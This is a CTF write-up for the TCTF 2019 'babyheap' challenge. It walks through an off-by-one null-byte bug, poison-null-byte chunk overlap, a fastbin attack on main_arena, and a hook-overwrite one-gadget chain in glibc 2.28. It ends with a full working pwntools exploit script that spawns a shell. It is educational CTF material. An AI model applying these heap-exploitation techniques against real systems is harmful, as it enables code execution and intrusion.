In the wild world of binaries,
with the most bewildering bugs and the most treacherous defenses,
IDA and gdb are our faithful companions,
logic and determination are our weapons,
and passion shows the way.
Hi, this is my first time writing a write-up in English. I attended TCTF 2019 last weekend and was lucky enough to solve this lovely babyheap challenge 30 minutes before the game ended. I really enjoyed this challenge and want to share it with more pwn players.
The challenge package contains three files: a 64-bit ELF called babyheap and two libraries, ld-2.28.so and libc-2.28.so, so it seems to be deployed on Ubuntu 18.10. If you are using 16.04 or another version of Ubuntu, you can certainly run this binary with LD_PRELOAD, but my suggestion is to set up an 18.10 environment for debugging: with libc6-dbg installed, you get libc symbols and can inspect the heap state easily. Meanwhile, the function offsets in libc will be exactly the same as on the target machine. Docker is a good option.
```
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
```
No surprise, all mitigations are present, and this is a typical note-system challenge with the following menu:

```
===== Baby Heap in 2019 =====
1. Allocate
2. Update
3. Delete
4. View
5. Exit
Command:
```
Vulnerability: off-by-one null byte
It looked very familiar to me, and I remembered a similar babyheap challenge from last year. I dropped both binaries into IDA, looked at the differences, and identified the bug very quickly (babyheap 2018 on the left, babyheap 2019 on the right). The change is in the update function: when it reads the new content for an allocated chunk, it calls a function to get the input.

(figure: bug1)

I stepped into that function and, clearly, there is an off-by-one null-byte bug in our 2019 challenge.

(figure: bug2)

Besides that, another change occurs in the init function, which stealthily mallocs a large chunk.

(figure: difference)

Other parts of the program are identical. By the way, babyheap 2018 had an arbitrary off-by-one bug: we could overwrite one extra byte into the size field of the next chunk. A great write-up (in Chinese) can be found here: 0CTF 2018 Babyheap
Constraints and thoughts
OK, let’s wrap up the bug and constraints of this challenge:
- Bug: off-by-one null byte
- Constraints:
  - item-list address randomization
  - 0 < size <= 0x58 (88)
  - at most 16 items in the array
  - libc 2.28 with the tcache feature
In the init function, we can see that the pointers to allocated items are not stored in the bss section as usual, but in a randomly mapped memory region that changes on each run. This prevents us from performing the unlink-attack technique or using the pointer list for an arbitrary write. It also brings some inconvenience when debugging, so I patched the string /dev/urandom in the binary to ./addr\x00 and created a 16-byte addr file in the same directory. With this trick, the address of the item array is fixed on each run.
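For reference, the 16-byte addr file can be produced with a couple of lines of Python; the exact bytes are arbitrary (this sketch assumes the patched binary simply reads 16 bytes from ./addr in place of /dev/urandom):

```python
# Create the fake "/dev/urandom" source for the patched binary.
# Any 16 bytes work; fixed bytes mean a fixed item-array address.
with open('addr', 'wb') as f:
    f.write(b'\x41' * 16)
```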
There are two well-known techniques based on an off-by-one null byte, and both can be found in how2heap. The first is house of einherjar, which results in a controlled pointer; the second is poison null byte, which leads to overlapping chunks. But both techniques require the ability to malloc a small-bin-sized chunk: for example, we need a chunk with a size like 0x1xx, so that we can overwrite it to 0x100 and perform the following steps. So mission one for us: figure out how to create a small-bin chunk.
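The core of both techniques is what the single zero byte does to the next chunk's size field; a minimal sketch of that arithmetic (modeling only the one-byte overwrite itself, not the surrounding heap checks):

```python
# The off-by-one write puts 0x00 into the least significant
# byte of the adjacent chunk's size field.
def overflow_null_byte(size_field):
    return size_field & ~0xff  # low byte overwritten with 0x00

# A 0x210-byte chunk with PREV_INUSE set (0x211) shrinks to 0x200;
# note that the PREV_INUSE bit is cleared as a side effect.
assert overflow_null_byte(0x211) == 0x200
assert overflow_null_byte(0x211) & 1 == 0
```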
Small bin chunk
Remember the suspicious malloc(0x1f000) in the init function? After that allocation, the top chunk size becomes 0x1da0.

```
pwndbg> heapinfoall
=================== Thread 1 ===================
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x555555578260 (size : 0x1da0)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x0
```
Then I investigated the source code of malloc.c: when the top chunk is not large enough for a malloc request, glibc calls malloc_consolidate() and merges the freed chunks in the fastbins! So the idea is to put a sequence of chunks into the fastbins, then consume the top chunk until it is small enough; any larger request will then trigger malloc_consolidate() and produce a small-bin-sized chunk.

At first I worried that the tcache feature would prevent us from consuming the top chunk far enough. However, it turns out that tcache does not apply to calloc: once a chunk gets into a tcache bin, you cannot allocate it again with calloc. Also, we can shrink the top chunk size after each allocation; this trick helps us consume the top chunk quickly. Here is the heap state before triggering malloc_consolidate():

```
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x555555578c80 --> 0x555555578c20 --> 0x555555578bc0 --> 0x555555578b60 --> 0x555555578b00 --> 0x555555578aa0 --> 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x555555578e10 (size : 0x30)
last_remainder: 0x0 (size : 0x0)
unsortbin: 0x0
(0x30) tcache_entry[1](7): 0x555555578a20 --> 0x5555555789f0 --> 0x5555555789c0 --> 0x555555578990 --> 0x555555578960 --> 0x555555578930 --> 0x555555578900
(0x40) tcache_entry[2](7): 0x5555555788c0 --> 0x555555578880 --> 0x555555578840 --> 0x555555578800 --> 0x5555555787c0 --> 0x555555578780 --> 0x555555578740
(0x50) tcache_entry[3](7): 0x5555555786f0 --> 0x5555555786a0 --> 0x555555578650 --> 0x555555578600 --> 0x5555555785b0 --> 0x555555578560 --> 0x555555578510
(0x60) tcache_entry[4](7): 0x5555555784b0 --> 0x555555578450 --> 0x5555555783f0 --> 0x555555578390 --> 0x555555578330 --> 0x5555555782d0 --> 0x555555578270
```
Then we calloc(0x28): it triggers malloc_consolidate(), merges the fastbin chunks into the unsorted bin, and creates a chunk of size 0x210.

```
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x555555578e10 (size : 0x30)
last_remainder: 0x555555578ad0 (size : 0x210)
unsortbin: 0x555555578ad0 (size : 0x210)
(0x30) tcache_entry[1](7): 0x555555578a20 --> 0x5555555789f0 --> 0x5555555789c0 --> 0x555555578990 --> 0x555555578960 --> 0x555555578930 --> 0x555555578900
(0x40) tcache_entry[2](7): 0x5555555788c0 --> 0x555555578880 --> 0x555555578840 --> 0x555555578800 --> 0x5555555787c0 --> 0x555555578780 --> 0x555555578740
(0x50) tcache_entry[3](7): 0x5555555786f0 --> 0x5555555786a0 --> 0x555555578650 --> 0x555555578600 --> 0x5555555785b0 --> 0x555555578560 --> 0x555555578510
(0x60) tcache_entry[4](7): 0x5555555784b0 --> 0x555555578450 --> 0x5555555783f0 --> 0x555555578390 --> 0x555555578330 --> 0x5555555782d0 --> 0x555555578270
```
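As a simplified model of what just happened (the exact offsets in the dump differ because some chunk sizes were forged along the way): merging several physically adjacent freed fastbin chunks produces one chunk too large for any fastbin, so it lands in the unsorted bin.

```python
# Simplified model of malloc_consolidate(): physically adjacent
# freed fastbin chunks are merged into one larger free chunk.
FASTBIN_MAX = 0xb0            # largest fastbin size in this binary
adjacent_free = [0x60] * 5    # several adjacent freed 0x60 chunks
merged = sum(adjacent_free)

# The merged chunk no longer fits in any fastbin, so it goes to
# the unsorted bin -- exactly the small-bin-sized chunk we need.
assert merged == 0x1e0
assert merged > FASTBIN_MAX
```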
Poison Null Byte
Comparing the two off-by-one null-byte techniques, house of einherjar does not seem to suit this case, so let's play with poison null byte. Here's an amazing blog post about it: Poison null byte | Ret2Forever (also in Chinese), which makes me feel I have to borrow a picture from it.

(figure: poison-null-byte diagram)
As the author concluded in that blog post, we need to allocate three chunks for this technique; name them a, b, and c. Chunk a can be of arbitrary size, but chunks b and c must not be fastbin-sized. We can already craft an unsorted-bin chunk to serve as chunk b, but what about chunk c? Does it have to be non-fastbin? No: the purpose of chunk c is to merge with chunk b and create a large chunk that overlaps some small chunks inside. So we can actually reuse the trick from the last section and trigger malloc_consolidate to merge chunks b and c. Okey dokey, if we lay out the heap as suggested, we get a heap state like this:

```
(0x20) fastbin[0]: 0x0
(0x30) fastbin[1]: 0x0
(0x40) fastbin[2]: 0x0
(0x50) fastbin[3]: 0x0
(0x60) fastbin[4]: 0x0
(0x70) fastbin[5]: 0x0
(0x80) fastbin[6]: 0x0
(0x90) fastbin[7]: 0x0
(0xa0) fastbin[8]: 0x0
(0xb0) fastbin[9]: 0x0
top: 0x555555578e10 (size : 0x30)
last_remainder: 0x555555578b10 (size : 0x230)
unsortbin: 0x555555578b10 (size : 0x230)
(0x020) smallbin[ 0]: 0x555555578cb0 (overlap chunk with 0x555555578b10(freed) )
(0x30) tcache_entry[1](7): 0x555555578a20 --> 0x5555555789f0 --> 0x5555555789c0 --> 0x555555578990 --> 0x555555578960 --> 0x555555578930 --> 0x555555578900
(0x40) tcache_entry[2](7): 0x5555555788c0 --> 0x555555578880 --> 0x555555578840 --> 0x555555578800 --> 0x5555555787c0 --> 0x555555578780 --> 0x555555578740
(0x50) tcache_entry[3](7): 0x5555555786f0 --> 0x5555555786a0 --> 0x555555578650 --> 0x555555578600 --> 0x5555555785b0 --> 0x555555578560 --> 0x555555578510
(0x60) tcache_entry[4](7): 0x5555555784b0 --> 0x555555578450 --> 0x5555555783f0 --> 0x555555578390 --> 0x555555578330 --> 0x5555555782d0 --> 0x555555578270
```
and the item array is like:

```
0xc0e5acba260: 0x1            0x58
0xc0e5acba270: 0x555555578a50 0x1
0xc0e5acba280: 0x48           0x555555578d50
0xc0e5acba290: 0x1            0x48
0xc0e5acba2a0: 0x555555578da0 0x1
0xc0e5acba2b0: 0x28           0x555555578df0
0xc0e5acba2c0: 0x1            0x28
0xc0e5acba2d0: 0x555555578ab0 0x1
0xc0e5acba2e0: 0x30           0x555555578ae0
0xc0e5acba2f0: 0x1            0x58
0xc0e5acba300: 0x555555578b40 0x0            <-- item #6, overlapped
0xc0e5acba310: 0x0            0x0
0xc0e5acba320: 0x1            0x58
0xc0e5acba330: 0x555555578ba0 0x1
0xc0e5acba340: 0x58           0x555555578c00
0xc0e5acba350: 0x1            0x58
0xc0e5acba360: 0x555555578c60 0x0
```
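A quick sanity check with the addresses from the dumps above confirms the overlap:

```python
# Addresses from the debugging session above (randomization patched out).
unsorted_chunk = 0x555555578b10   # freed chunk sitting in the unsorted bin
unsorted_size  = 0x230
item6_ptr      = 0x555555578b40   # item #6, still in use

# The in-use pointer lies inside the freed chunk: overlapping chunks.
assert unsorted_chunk <= item6_ptr < unsorted_chunk + unsorted_size
```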
Now the large chunk in the unsorted bin (0x555555578b10) already overlaps with item #6 (0x555555578b40). The following job is straightforward, just like babyheap 2018: we perform a fastbin attack to get an item at an address inside main_arena, then we change the top chunk pointer to somewhere before __malloc_hook, and then we can overwrite __malloc_hook with a one gadget. By the way, you have to turn on ASLR to complete the fastbin attack on main_arena, and it only succeeds when the heap address starts with 0x56; otherwise the size check fails.
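The size check in question is glibc's fastbin sanity check: the fake chunk's size field inside main_arena is supplied by a byte of a stored heap pointer, and it must map to the same fastbin index as the request. A sketch of the check, modeled on the chunksize()/fastbin_index() macros in glibc's malloc.c:

```python
def chunksize(size_field):
    # mask off the PREV_INUSE / IS_MMAPPED / NON_MAIN_ARENA flag bits
    return size_field & ~0x7

def fastbin_index(size):
    # 64-bit glibc: fastbins step by 0x10, starting at 0x20
    return (size >> 4) - 2

# A calloc(0x48) request is served from the 0x50 fastbin.
wanted = fastbin_index(0x50)

# With a heap address starting with 0x56, the fake chunk's size
# byte is 0x56, which masks down to 0x50 -- the index check passes.
assert fastbin_index(chunksize(0x56)) == wanted
```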
But unfortunately, none of the one gadgets in libc-2.28 meets its constraints at the call site:

```
0x50186 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL

0x501e3 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x103f50 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
```
@Tac1t0rnX also concluded some workarounds for this situation here: Pwnable.tw secretgarden. I first tried setting __malloc_hook to _libc_realloc+??? and __realloc_hook to one_gadget, but that failed as well. So I had to turn to the __free_hook trick, which overwrites the top chunk pointer with __free_hook - 0xb58 and allocates a bunch of junk chunks to reach __free_hook. To consume the top chunk and reach the __free_hook buffer, we need to zero out the fastbin after each free. Here is the very first dirty exp I used during the game.
Exp #1
```python
from pwn import *
```
Better solution?
Actually, it cost me a lot of time debugging the __free_hook trigger, so after the game I wondered: is there a better way to call the one gadget? From the write-up by r3kapig (here), I found that they set __malloc_hook to svc_run+0x38 and __realloc_hook to one_gadget. svc_run+0x38 happens to be a call realloc instruction; with this additional call, [rsp+0x40] == 0 at the one-gadget point.

(figure: svc_run)

But this is still a coincidence. Can we have something more general for similar situations? So I looked at every call realloc in libc-2.28.so and finally found a perfect jump gadget. The gadget is at 0x105ae0; it sets [rsp+0x38] to 0 and then calls realloc, so when the program hits our one-gadget point, [rsp+0x40] is exactly where we set the 0 before!
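The offset bookkeeping behind "exactly where we set 0" is just one call's worth of stack shift; a minimal model (this assumes the only rsp change between the gadget's store and the one-gadget check is the return address pushed by the call):

```python
# The jump gadget writes 0 to [rsp+0x38] and then executes
# `call realloc`, which pushes an 8-byte return address.
STORE_OFFSET = 0x38   # gadget's store, relative to rsp before the call
CALL_PUSH = 8         # rsp decreases by 8 at the call

# From the callee's point of view, the zero now sits 8 bytes
# further out: precisely the one gadget's [rsp+0x40] constraint.
assert STORE_OFFSET + CALL_PUSH == 0x40
```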
So next time you meet this situation in libc-2.28, feel confident to set __malloc_hook to libc+0x105ae0 and __realloc_hook to the second one gadget.

(figure: gadget)
Here is my refined exp:

```python
from pwn import *
import re

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
env = {'LD_PRELOAD': './libc-2.28.so'}
libc = ELF('./libc-2.28.so')

if len(sys.argv) == 1:
    p = process('./babyheap1')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])

def rc(x):
    return p.recv(x)

def ru(x):
    return p.recvuntil(x)

def se(x):
    return p.send(x)

def sl(x):
    return p.sendline(x)

def sea(a, b):
    return p.sendafter(a, b)

def sla(a, b):
    return p.sendlineafter(a, b)

def info_addr(tag, addr):
    return p.info(tag + ': {:#x}'.format(addr))

pattern = re.compile("Chunk (.*) Allocated")

def alloc(size):
    ru('Command: ')
    sl('1')
    ru('Size: ')
    sl(str(size))
    res = ru('\n')
    return int(pattern.search(res).group(1))

def update(idx, size, content):
    ru('Command: ')
    sl('2')
    ru('Index: ')
    sl(str(idx))
    ru('Size: ')
    sl(str(size))
    ru('Content: ')
    se(content)

def delete(idx):
    ru('Command: ')
    sl('3')
    ru('Index: ')
    sl(str(idx))

def view(idx):
    ru('Command: ')
    sl('4')
    ru('Index: ')
    sl(str(idx))

def prepare_fastbin():
    a = alloc(0x58)   #0 stays at 0x60
    b1 = alloc(0x58)  #1 fastbin 0xc0
    b2 = alloc(0x58)  #2 fastbin 0x120
    b3 = alloc(0x58)  #3 fastbin 0x180
    b4 = alloc(0x58)  #4 fastbin 0x1e0
    b5 = alloc(0x58)  #5 fastbin 0x240
    b6 = alloc(0x58)  #6 fastbin 0x2a0
    c = alloc(0x58)   #7 fastbin 0x300
    # prepare fake chunk: c.prev_size = 0x200
    update(7, 0x48, '\x00'*0x40 + p64(0x200))
    # put them into the fastbin to wait for consolidation
    for i in range(1, 7):
        delete(i)

def strain_and_prepare():
    # fill tcache to consume the top chunk
    for size in [0x58, 0x48, 0x38]:
        for i in range(7):
            _id = alloc(size)
            update(_id, size, 'a'*size)
            delete(_id)
    size = 0x28
    for i in range(2):  # fill tcache
        _id = alloc(size)
        delete(_id)
    for i in range(5):
        _id = alloc(size)
        update(_id, size, 'a'*size)
        delete(_id)
    # now top_chunk->size = 0x100
    prepare_fastbin()

alloc(0x48)  #0
alloc(0x48)  #1
alloc(0x28)
strain_and_prepare()
# now top_chunk->size = 0x30
# we can alloc any size >= 0x30 to trigger consolidation
off_by_one_chunk = alloc(0x28)
# now off_by_one_chunk (0x28) is at 0x87a0, a small bin chunk (0x210) at 0x87c0
# we can off-by-one to set the small bin chunk size to 0x200
update(off_by_one_chunk, 0x28, 'a'*0x28)
a = alloc(0x58)   # fastbin
b1 = alloc(0x58)  # in use
b2 = alloc(0x58)  # in use
b3 = alloc(0x58)  # in use
b4 = alloc(0x58)  # fastbin
c = 7
# push into fastbin
update(a, 0x51, 'a'*0x50 + p8(0x60))  # put a fake chunk size to bypass the check
delete(c)
delete(a)
# trigger consolidation
alloc(0x30)
# [OVERLAP] now [b1, b2, b3, b4] are in use but also inside the unsorted bin
victim = alloc(0x58)
# b1[0x58]: 0x555555578830,
# victim[0x58]: 0x555555578810 overlap
# leak libc
view(b1)
ru(': ')
leak = ru('\n')
leak_libc = u64(leak[0x40:0x48])
info_addr('leak_libc', leak_libc)
libc.address = leak_libc - 0x1e4ca0
info_addr('libc', libc.address)
# leak heap
victim2 = alloc(0x48)
delete(1)  # [0x48]
delete(victim2)
view(b1)
ru(': ')
leak = ru('\n')
leak_heap = u64(leak[0x40:0x48])
info_addr('leak_heap', leak_heap)
heap = leak_heap - 0x1fce0
info_addr('heap', heap)
# fastbin attack: get a chunk at main_arena
delete(4)  # [0x28]
arena_target = libc.address + 0x1e4c55
# edit victim2->fd
update(b1, 0x48, '\x00'*0x38 + p64(0x51) + p64(arena_target))
junk = alloc(0x48)
arena_buf = alloc(0x48)
main_arena = libc.address + 0x1e4c40
info_addr("arena", main_arena)
malloc_hook = libc.symbols['__malloc_hook']
info_addr("malloc hook", malloc_hook)
new_top = malloc_hook - 0x28
info_addr("new top", new_top)
update(arena_buf, 0x43, '\x00'*0x3b + p64(new_top))
# consume the remaining unsorted bin
for i in range(4):
    junk = alloc(0x58)
    delete(junk)
update(arena_buf, 0x30, '\x00'*0x30)
victim = alloc(0x58)
one_gadget = libc.address + 0x501e3
jump_gadget = libc.address + 0x105ae0
update(victim, 0x20, '\x00'*0x10 + p64(one_gadget) + p64(jump_gadget))
# allocate a chunk to trigger the one gadget
sl("1")
sl("1")
p.interactive()
```
Final words
With this challenge solved, our team ranked at 10th place on the rising-star scoreboard. Thanks to @eee and @Oops for all the great challenges; I really enjoyed the game! I hope our team can meet the top players in Shanghai!